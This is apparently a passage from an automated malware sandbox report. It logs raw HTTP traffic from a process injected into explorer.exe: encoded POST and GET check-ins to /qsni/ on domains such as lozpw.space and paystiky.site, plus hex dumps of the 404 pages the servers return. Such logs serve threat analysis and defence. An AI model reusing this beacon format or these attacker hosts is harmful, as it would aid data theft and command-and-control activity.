                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Mar 30, 2023 10:24:27.548108101 CEST129INHTTP/1.1 404 Not Found
                                                                                          Server: nginx
                                                                                          Date: Thu, 30 Mar 2023 08:24:27 GMT
                                                                                          Content-Type: text/html; charset=utf-8
                                                                                          Transfer-Encoding: chunked
                                                                                          Connection: close
                                                                                          Vary: Accept-Encoding
                                                                                          Data Raw: 31 64 31 37 0d 0a 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0d 0a 20 20 20 20 3c 74 69 74 6c 65 3e 53 79 73 74 65 6d 20 45 72 72 6f 72 3c 2f 74 69 74 6c 65 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 72 6f 62 6f 74 73 22 20 63 6f 6e 74 65 6e 74 3d 22 6e 6f 69 6e 64 65 78 2c 6e 6f 66 6f 6c 6c 6f 77 22 20 2f 3e 0d 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2c 20 75 73 65 72 2d 73 63 61 6c 61 62 6c 65 3d 6e 6f 22 3e 0d 0a 20 20 20 20 3c 73 74 79 6c 65 3e 0d 0a 20 20 20 20 20 20 20 20 2f 2a 20 42 61 73 65 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 62 6f 64 79 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 33 33 33 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 3a 20 31 34 70 78 20 56 65 72 64 61 6e 61 2c 20 22 48 65 6c 76 65 74 69 63 61 20 4e 65 75 65 22 2c 20 68 65 6c 76 65 74 69 63 61 2c 20 41 72 69 61 6c 2c 20 27 4d 69 63 72 6f 73 6f 66 74 20 59 61 48 65 69 27 2c 20 73 61 6e 73 2d 73 65 72 69 66 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 30 20 32 30 70 78 20 32 30 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 62 72 65 61 6b 3a 20 62 72 65 61 6b 2d 77 6f 72 64 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 31 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 30 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 32 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 35 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6c 69 6e 65 2d 68 65 69 67 68 74 3a 20 33 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 32 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 3a 20 36 70 78 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 38 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 65 65 65 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 33 2e 73 75 62 68 65 61 64 69 6e 67 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 6f 6c 6f 72 3a 20 23 34 32 38 38 63 65 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 36 70 78 20 30 20 30 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 34 30 30 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 68 33 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 6d 61 72 67 69 6e 3a 20 31 32 70 78 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 66 6f 6e 74 2d 73 69 7a 65 3a 20 31 36 70 78 3b 0d 0a 20 20 20 20 20 20 20 20
                                                                                          Data Ascii: 1d17<!DOCTYPE html><html><head> <meta charset="UTF-8"> <title>System Error</title> <meta name="robots" content="noindex,nofollow" /> <meta name="viewport" content="width=device-width, initial-scale=1, user-scalable=no"> <style> /* Base */ body { color: #333; font: 14px Verdana, "Helvetica Neue", helvetica, Arial, 'Microsoft YaHei', sans-serif; margin: 0; padding: 0 20px 20px; word-break: break-word; } h1{ margin: 10px 0 0; font-size: 28px; font-weight: 500; line-height: 32px; } h2{ color: #4288ce; font-weight: 400; padding: 6px 0; margin: 6px 0 0; font-size: 18px; border-bottom: 1px solid #eee; } h3.subheading { color: #4288ce; margin: 6px 0 0; font-weight: 400; } h3{ margin: 12px; font-size: 16px;
                                                                                          Mar 30, 2023 10:24:27.548146009 CEST130INData Raw: 20 20 20 20 66 6f 6e 74 2d 77 65 69 67 68 74 3a 20 62 6f 6c 64 3b 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 61 62 62 72 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 63 75 72 73 6f 72 3a 20 68 65 6c 70 3b 0d 0a 20 20 20 20 20
                                                                                          Data Ascii: font-weight: bold; } abbr{ cursor: help; text-decoration: underline; text-decoration-style: dotted; } a{ color: #868686; cursor: pointer;
                                                                                          Mar 30, 2023 10:24:27.548166990 CEST132INData Raw: 6c 2d 6d 64 2d 39 20 7b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 77 69 64 74 68 3a 20 31 30 30 25 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20 20 2f 2a 20 45 78 63 65 70
                                                                                          Data Ascii: l-md-9 { width: 100%; } } /* Exception Info */ .exception { margin-top: 20px; } .exception .message{ padding: 12px; border: 1px s
                                                                                          Mar 30, 2023 10:24:27.548227072 CEST133INData Raw: 75 72 79 20 47 6f 74 68 69 63 22 2c 43 6f 6e 73 6f 6c 61 73 2c 22 4c 69 62 65 72 61 74 69 6f 6e 20 4d 6f 6e 6f 22 2c 43 6f 75 72 69 65 72 2c 56 65 72 64 61 6e 61 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 70 61 64 64 69 6e 67 2d 6c 65 66 74 3a
                                                                                          Data Ascii: ury Gothic",Consolas,"Liberation Mono",Courier,Verdana; padding-left: 40px; } .exception .source-code pre li{ border-left: 1px solid #ddd; height: 18px; line-height: 18px;
                                                                                          Mar 30, 2023 10:24:27.548356056 CEST134INData Raw: 65 2d 6c 61 79 6f 75 74 3a 66 69 78 65 64 3b 0d 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 6f 72 64 2d 77 72 61 70 3a 62 72 65 61 6b 2d 77 6f 72 64 3b 20 20 20 20 20 20 20 20 20 20 20 20 0d 0a 20 20 20 20 20 20 20 20 7d 0d 0a 20 20 20 20 20 20 20
                                                                                          Data Ascii: e-layout:fixed; word-wrap:break-word; } .exception-var table caption{ text-align: left; font-size: 16px; font-weight: bold; padding: 6px 0;
                                                                                          Mar 30, 2023 10:24:27.548507929 CEST136INData Raw: 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 38 30 20 7d 20 20 2f 2a 20 73 74 72 69 6e 67 20 63 6f 6e 74 65 6e 74 20 2a 2f 0d 0a 20 20 20 20 20 20 20 20 70 72 65 2e 70 72 65 74 74 79 70 72 69 6e 74 20 2e 6b 77 64 20 7b 20 63 6f 6c 6f 72 3a 20 23 30 30 38
                                                                                          Data Ascii: { color: #080 } /* string content */ pre.prettyprint .kwd { color: #008 } /* a keyword */ pre.prettyprint .com { color: #800 } /* a comment */ pre.prettyprint .typ { color: #606 } /* a type name */ pre.
                                                                                          Mar 30, 2023 10:24:27.548530102 CEST136INData Raw: 30 0d 0a 0d 0a
                                                                                          Data Ascii: 0


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          13192.168.2.649720173.199.124.12680C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:24:32.920568943 CEST137OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.lozpw.space
                                                                                          Connection: close
                                                                                          Content-Length: 188
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.lozpw.space
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.lozpw.space/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 32 38 58 4a 5a 50 35 49 42 5f 4f 46 75 45 32 65 73 6a 67 72 73 34 35 52 4d 6d 5a 65 45 64 4d 65 79 39 59 2d 6b 6f 44 53 41 74 59 33 72 55 28 79 67 6d 33 72 30 6c 53 46 52 51 57 39 4a 73 7e 5f 34 71 71 4e 4f 43 36 64 62 4c 53 56 49 6a 46 4f 43 5f 67 46 68 45 34 74 4f 64 6e 51 76 33 71 47 4b 6b 74 70 4d 72 5a 46 70 55 31 70 70 6d 66 72 68 6a 66 6e 6d 47 53 4b 53 67 66 33 41 5a 6f 35 68 7a 53 30 32 58 4d 4f 76 78 54 46 61 37 51 61 43 61 6d 68 71 56 36 78 4b 72 28 56 41 36 76 78 6e 69 6f 46 77 50 45 37 67 4e 4e 48 74 5f 57 31 55 49 6d 72 58 33 30 2e 00 00 00 00 00 00 00 00
                                                                                          Data Ascii: C6=28XJZP5IB_OFuE2esjgrs45RMmZeEdMey9Y-koDSAtY3rU(ygm3r0lSFRQW9Js~_4qqNOC6dbLSVIjFOC_gFhE4tOdnQv3qGKktpMrZFpU1ppmfrhjfnmGSKSgf3AZo5hzS02XMOvxTFa7QaCamhqV6xKr(VA6vxnioFwPE7gNNHt_W1UImrX30.
                                                                                          Mar 30, 2023 10:24:33.036650896 CEST137INHTTP/1.1 404 Not Found
                                                                                          access-control-allow-origin: http://www.lozpw.space
                                                                                          cache-control: max-age=0, no-cache, must-revalidate, proxy-revalidate
                                                                                          access-control-allow-credentials: true
                                                                                          access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Authorization, Content-Range, Cache-Control
                                                                                          content-type: application/json; charset=utf-8
                                                                                          content-length: 49
                                                                                          date: Thu, 30 Mar 2023 08:24:32 GMT
                                                                                          keep-alive: timeout=5
                                                                                          connection: close
                                                                                          Data Raw: 7b 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 2c 22 6d 65 73 73 61 67 65 22 3a 22 43 61 6e 6e 6f 74 20 50 4f 53 54 20 2f 71 73 6e 69 2f 22 7d
                                                                                          Data Ascii: {"statusCode":404,"message":"Cannot POST /qsni/"}


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          14192.168.2.649721173.199.124.12680C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:24:35.583024025 CEST139OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.lozpw.space
                                                                                          Connection: close
                                                                                          Content-Length: 1452
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.lozpw.space
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.lozpw.space/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 32 38 58 4a 5a 50 35 49 42 5f 4f 46 75 6b 6d 65 70 45 30 72 34 6f 35 65 4a 6d 5a 65 65 74 4d 61 79 39 55 2d 6b 72 50 43 41 62 41 33 72 48 48 79 67 41 4c 72 7a 56 53 46 56 67 57 35 45 4d 7e 54 34 71 7e 77 4f 48 65 6e 62 4e 43 56 4a 43 56 4f 45 39 59 61 35 45 34 34 4b 64 6e 54 76 33 71 54 4b 6b 38 67 4d 6f 31 5f 70 55 74 70 6f 51 6a 72 6d 54 66 6b 36 32 53 4b 53 67 66 37 41 5a 6f 5a 68 33 32 61 32 58 6b 65 76 42 28 46 64 61 77 61 46 35 7e 69 36 56 36 31 4a 72 7e 4c 50 76 65 76 74 53 35 34 28 64 59 41 38 76 78 4a 74 66 36 6c 48 74 76 71 42 53 72 79 31 54 55 6e 77 54 71 37 36 70 65 6d 47 42 74 6e 4b 74 39 43 6b 59 57 68 71 42 57 53 48 50 6a 41 64 71 52 46 6f 36 55 36 6b 6f 37 6b 5a 4a 6f 65 33 75 39 49 49 68 6b 62 4c 48 72 59 58 76 66 7a 32 79 30 72 5a 32 62 76 55 6d 35 64 78 62 44 48 48 2d 4b 63 46 49 32 79 54 6c 71 6a 47 43 68 39 79 58 55 66 38 54 53 7a 70 63 73 4c 78 34 6d 77 6b 48 4e 6a 72 49 6e 55 73 55 7a 45 4a 79 75 30 37 4c 55 47 46 55 45 38 6c 35 53 36 74 30 68 47 6c 6d 72 64 73 49 76 4c 52 75 6f 35 6c 39 39 6a 39 79 51 39 59 77 36 39 34 42 50 42 76 55 72 73 7a 70 64 70 6e 4d 50 38 57 52 73 45 52 42 42 68 6f 43 6a 4e 6c 36 5a 6a 6b 62 62 63 43 75 36 61 54 68 63 70 71 33 39 6b 50 49 46 4b 37 70 4c 68 6b 2d 67 65 4d 51 50 54 43 67 76 37 39 54 48 47 37 6a 50 6e 76 4d 53 7a 41 4b 58 77 6b 6f 53 4f 30 47 79 36 4e 5a 37 32 43 41 30 61 64 5a 6f 43 31 34 42 58 50 50 47 49 35 4e 71 47 4e 71 76 4b 6c 79 70 6f 46 64 4d 78 6f 50 6f 34 6b 71 76 4f 68 48 72 44 33 4f 74 42 37 50 41 68 31 66 28 34 6d 55 31 35 44 31 59 4d 38 36 7e 64 48 55 41 34 7e 6d 74 50 6f 6e 33 43 7e 76 7e 63 4f 76 4f 2d 52 69 65 42 43 45 6d 32 33 43 46 70 43 32 6b 63 76 68 34 44 64 71 36 71 70 44 54 46 4d 6c 37 61 49 7a 6c 4b 37 32 68 64 4e 4b 73 61 79 39 47 4d 36 36 50 63 77 5f 74 6c 63 7a 33 6c 4a 53 76 4a 36 66 4a 75 4f 71 4b 65 31 71 5a 53 6d 62 56 61 42 43 49 46 31 43 57 51 36 61 45 51 31 69 33 75 71 52 35 2d 77 66 62 77 44 59 45 57 5a 37 55 70 71 6b 34 30 4c 44 54 51 66 57 52 49 47 6e 4e 78 54 55 5a 4e 47 78 48 4b 69 75 6f 6b 42 6f 44 69 35 2d 4d 74 76 58 6d 6d 72 5a 75 45 71 32 68 65 55 4c 6a 4c 52 6f 4f 74 4c 30 71 5f 75 33 53 5f 30 5a 67 66 64 77 66 6b 44 71 37 46 79 65 6e 6c 33 59 57 77 64 49 68 51 68 33 55 55 7a 35 33 47 6b 70 43 76 59 36 72 47 31 6a 41 44 58 38 4b 2d 66 51 48 5a 65 76 32 35 38 31 79 55 58 77 32 35 62 30 45 50 53 31 67 52 35 6d 59 4e 4e 5f 7e 4e 46 34 31 4c 50 73 30 44 4b 39 48 46 45 4c 57 76 37 47 50 77 37 72 78 46 56 67 61 62 75 42 69 76 54 46 42 6c 4d 2d 59 79 70 52 65 54 77 39 64 5a 4d 6b 79 6d 4b 45 42 73 6f 42 33 4c 59 42 58 31 4a 72 50 76 68 41 49 4e 53 79 78 77 67 49 59 45 28 6a 55 5f 56 79 4e 42 51 2d 71 69 58 73 4c 50 49 53 61 53 50 63 6e 70 41 2d 28 30 4d 6d 79 54 47 6b 6d 33 41 61 6f 35 4d 78 56 30 76 55 5a 45 47 78 64 67 74 57 4d 6e 55 59 34 35 49 4c 65 32 36 76 69 35 4f 61 33 35 69 69 43 70 52 65 32 4c 38 49 30 77 6d 37 63 4d 72 46 58 41 47 57 76 2d 41 4b 53 6b 53 6e 5a 42 5a 55 56 62 59 31 4b 77 41 72 4e 6d 66 76 6a 70 61 6c 59 79 65 4d 61 5f 77 6d 73 38 48 52 36 39 63 4b 76 53 31 6e 54 4b 36 6b 32 4d 44 45 54 61 62 44 70 32 52 63 30 32 4e 42 54 42 7a 56 28 4a 41 66 72 53 78 64 76 4a 68 38 66 59 41 69 69 67 67 34 43 51 4c 77 77 44 5a 78 4f 53 46 47 36 4f 65 71 4b 6d 6b 69 76 58 4d 71 57 66 73 45 53 74 37 63 31 51 6c 36 71 4d 44 35 56 72 67 67 54 68 45 67 4f 7a 45 39 6c 5a 74 77 45 61 51 53 69 68 50 65 36 53 63 55 28 31 31 76 4a 70 42 66 43 6d 50 61 4a 70 4c 55 76 55 51 65 4c 77 33 6e 62 72 70 62 57 36 4c 45 62 56 39 62 64 53 64 43 51 69 7e 79 6d 5a 78 35 33 6b 48 2d 4b 66 50 67 65 31 35 6a 52 79 46 49 6c 74 47 36 48 64 6e 64 39 34 4f 35 31 52 4f 71 49 59 45 50 79 36 55 6d 78 64 6b 4e 78 59 65 4e 78 6b 69 49 34 76 33 50 4b 30 58 73 49 46 59 54 31 75 6d 67 54 37 48 76 6d 5f 62 6b 6d 78 4f 63 68 66 53 35 77 58 4c 37 6c 36 66 65 33 31 69 65 39 46 42 70 69 73 50 61 6c 41 70 49 62 6e 77 33 47 4d 72 38 31 54 6a 64 78 35 73 46 58 78 66 61 79 4f 4f 51 7a 47 49 6d 77 77 36 75 46 49 53 79 6e 4a 41 66 41 66 62 5f 37 64 35 47 37 76 7e 76 33 6b 72 49 72 72 69 79 4a 47 43 61 6f 6e 51 67 52 4f 44 6d 52 4f 59 74 79 4e
                                                                                          Data Ascii: C6=28XJZP5IB_OFukmepE0r4o5eJmZeetMay9U-krPCAbA3rHHygALrzVSFVgW5EM~T4q~wOHenbNCVJCVOE9Ya5E44KdnTv3qTKk8gMo1_pUtpoQjrmTfk62SKSgf7AZoZh32a2XkevB(FdawaF5~i6V61Jr~LPvevtS54(dYA8vxJtf6lHtvqBSry1TUnwTq76pemGBtnKt9CkYWhqBWSHPjAdqRFo6U6ko7kZJoe3u9IIhkbLHrYXvfz2y0rZ2bvUm5dxbDHH-KcFI2yTlqjGCh9yXUf8TSzpcsLx4mwkHNjrInUsUzEJyu07LUGFUE8l5S6t0hGlmrdsIvLRuo5l99j9yQ9Yw694BPBvUrszpdpnMP8WRsERBBhoCjNl6ZjkbbcCu6aThcpq39kPIFK7pLhk-geMQPTCgv79THG7jPnvMSzAKXwkoSO0Gy6NZ72CA0adZoC14BXPPGI5NqGNqvKlypoFdMxoPo4kqvOhHrD3OtB7PAh1f(4mU15D1YM86~dHUA4~mtPon3C~v~cOvO-RieBCEm23CFpC2kcvh4Ddq6qpDTFMl7aIzlK72hdNKsay9GM66Pcw_tlcz3lJSvJ6fJuOqKe1qZSmbVaBCIF1CWQ6aEQ1i3uqR5-wfbwDYEWZ7Upqk40LDTQfWRIGnNxTUZNGxHKiuokBoDi5-MtvXmmrZuEq2heULjLRoOtL0q_u3S_0ZgfdwfkDq7Fyenl3YWwdIhQh3UUz53GkpCvY6rG1jADX8K-fQHZev2581yUXw25b0EPS1gR5mYNN_~NF41LPs0DK9HFELWv7GPw7rxFVgabuBivTFBlM-YypReTw9dZMkymKEBsoB3LYBX1JrPvhAINSyxwgIYE(jU_VyNBQ-qiXsLPISaSPcnpA-(0MmyTGkm3Aao5MxV0vUZEGxdgtWMnUY45ILe26vi5Oa35iiCpRe2L8I0wm7cMrFXAGWv-AKSkSnZBZUVbY1KwArNmfvjpalYyeMa_wms8HR69cKvS1nTK6k2MDETabDp2Rc02NBTBzV(JAfrSxdvJh8fYAiigg4CQLwwDZxOSFG6OeqKmkivXMqWfsESt7c1Ql6qMD5VrggThEgOzE9lZtwEaQSihPe6ScU(11vJpBfCmPaJpLUvUQeLw3nbrpbW6LEbV9bdSdCQi~ymZx53kH-KfPge15jRyFIltG6Hdnd94O51ROqIYEPy6UmxdkNxYeNxkiI4v3PK0XsIFYT1umgT7Hvm_bkmxOchfS5wXL7l6fe31ie9FBpisPalApIbnw3GMr81Tjdx5sFXxfayOOQzGImww6uFISynJAfAfb_7d5G7v~v3krIrriyJGCaonQgRODmROYtyNabco4RxPnqkKkE1p55D-2oLZt5r63qRXq13a412LvFyVndE3cG6V7eqsZOC6RpCbIGIqz7gwKtwofhDkjfGqbsY.
                                                                                          Mar 30, 2023 10:24:35.697581053 CEST140INHTTP/1.1 404 Not Found
                                                                                          access-control-allow-origin: http://www.lozpw.space
                                                                                          cache-control: max-age=0, no-cache, must-revalidate, proxy-revalidate
                                                                                          access-control-allow-credentials: true
                                                                                          access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Authorization, Content-Range, Cache-Control
                                                                                          content-type: application/json; charset=utf-8
                                                                                          content-length: 49
                                                                                          date: Thu, 30 Mar 2023 08:24:35 GMT
                                                                                          keep-alive: timeout=5
                                                                                          connection: close
                                                                                          Data Raw: 7b 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 2c 22 6d 65 73 73 61 67 65 22 3a 22 43 61 6e 6e 6f 74 20 50 4f 53 54 20 2f 71 73 6e 69 2f 22 7d
                                                                                          Data Ascii: {"statusCode":404,"message":"Cannot POST /qsni/"}


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          15192.168.2.649722173.199.124.12680C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:24:38.460890055 CEST141OUTGET /qsni/?C6=7+/pa7cMIZb54wjm1RsZvtFfNVB8Z/QdqaMN0Z3PMdssi3LToC7r01OcckC1KOCTsbG7Wxv/cdrmK2w8C8oi13hsN9vphDqPYEofN51tqDkO&ZOm=dXna0d HTTP/1.1
                                                                                          Host: www.lozpw.space
                                                                                          Connection: close
                                                                                          Data Raw: 00 00 00 00 00 00 00
                                                                                          Data Ascii:
                                                                                          Mar 30, 2023 10:24:38.566848040 CEST141INHTTP/1.1 404 Not Found
                                                                                          access-control-allow-origin: *
                                                                                          cache-control: max-age=0, no-cache, must-revalidate, proxy-revalidate
                                                                                          access-control-allow-credentials: true
                                                                                          access-control-allow-headers: Origin, X-Requested-With, Content-Type, Accept, Authorization, Content-Range, Cache-Control
                                                                                          content-type: application/json; charset=utf-8
                                                                                          content-length: 48
                                                                                          date: Thu, 30 Mar 2023 08:24:38 GMT
                                                                                          keep-alive: timeout=5
                                                                                          connection: close
                                                                                          Data Raw: 7b 22 73 74 61 74 75 73 43 6f 64 65 22 3a 34 30 34 2c 22 6d 65 73 73 61 67 65 22 3a 22 43 61 6e 6e 6f 74 20 47 45 54 20 2f 71 73 6e 69 2f 22 7d
                                                                                          Data Ascii: {"statusCode":404,"message":"Cannot GET /qsni/"}


                                                                                          Session IDSource IPSource PortDestination IPDestination PortProcess
                                                                                          16192.168.2.649723199.192.30.14780C:\Windows\explorer.exe
                                                                                          TimestampkBytes transferredDirectionData
                                                                                          Mar 30, 2023 10:24:43.906718969 CEST143OUTPOST /qsni/ HTTP/1.1
                                                                                          Host: www.paystiky.site
                                                                                          Connection: close
                                                                                          Content-Length: 188
                                                                                          Cache-Control: no-cache
                                                                                          Origin: http://www.paystiky.site
                                                                                          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
                                                                                          Content-Type: application/x-www-form-urlencoded
                                                                                          Accept: */*
                                                                                          Referer: http://www.paystiky.site/qsni/
                                                                                          Accept-Language: en-US
                                                                                          Accept-Encoding: gzip, deflate
                                                                                          Data Raw: 43 36 3d 37 66 28 7a 39 4e 4a 64 72 6f 36 64 64 35 4e 70 65 5a 65 57 6b 51 53 61 6b 69 55 65 50 43 30 41 53 45 4e 5a 62 35 6a 72 6d 6d 6d 5a 30 2d 77 4d 6a 39 75 4e 61 69 49 7a 53 33 38 32 46 47 78 38 77 45 47 36 75 43 37 2d 4d 78 33 57 67 30 6a 55 68 54 70 72 51 38 43 76 58 48 49 46 4a 63 30 54 34 6c 51 54 5a 58 36 63 59 75 34 71 7a 6e 76 51 59 34 6a 30 4c 6f 4b 42 78 73 32 78 49 52 64 57 64 6d 44 39 70 45 6f 46 42 4e 68 53 37 5a 59 7a 73 48 4d 38 77 37 30 6f 58 57 77 6f 31 69 45 33 36 47 69 71 59 66 4f 62 45 66 52 68 70 7a 71 70 79 72 52 68 28 6f 6b 2e 00 00 00 00 00 00 00 00
                                                                                          Data Ascii: C6=7f(z9NJdro6dd5NpeZeWkQSakiUePC0ASENZb5jrmmmZ0-wMj9uNaiIzS382FGx8wEG6uC7-Mx3Wg0jUhTprQ8CvXHIFJc0T4lQTZX6cYu4qznvQY4j0LoKBxs2xIRdWdmD9pEoFBNhS7ZYzsHM8w70oXWwo1iE36GiqYfObEfRhpzqpyrRh(ok.
                                                                                          Mar 30, 2023 10:24:44.236576080 CEST144INHTTP/1.1 404 Not Found
                                                                                          Date: Thu, 30 Mar 2023 08:24:43 GMT
                                                                                          Server: Apache
                                                                                          Content-Length: 4406
                                                                                          Connection: close
                                                                                          Content-Type: text/html
                                                                                          Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 0d 0a 3c 68 65 61 64 3e 0d 0a 3c 74 69 74 6c 65 3e 43 6f 64 65 73 74 65 72 20 7c 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0d 0a 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 75 74 66 2d 38 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 72 65 73 70 6f 6e 73 69 76 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 20 68 72 65 66 3d 22 2f 63 73 73 2f 73 74 79 6c 65 2e 63 73 73 22 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 20 6d 65 64 69 61 3d 22 73 63 72 65 65 6e 22 3e 0d 0a 3c 6c 69 6e 6b 20 68 72 65 66 3d 27 68 74 74 70 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 3f 66 61 6d 69 6c 79 3d 4f 70 65 6e 2b 53 61 6e 73 3a 34 30 30 2c 33 30 30 27 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 73 75 70 65 72 66 69 73 68 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 65 61 73 69 6e 67 2e 31 2e 33 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 20 73 72 63 3d 22 2f 6a 73 2f 6a 71 75 65 72 79 2e 63 6f 6f 6b 69 65 2e 6a 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0d 0a 3c 73 63 72 69 70 74 3e 0d 0a 6a 51 75 65 72 79 28 77 69 6e 64 6f 77 29 2e 6c 6f 61 64 28 66 75 6e 63 74 69 6f 6e 20 28 29 20 7b 0d 0a 20 20 20 20 6a 51 75 65 72 79 28 27 2e 73 70 69 6e 6e 65 72 27 29 2e 61 6e 69 6d 61 74 65 28 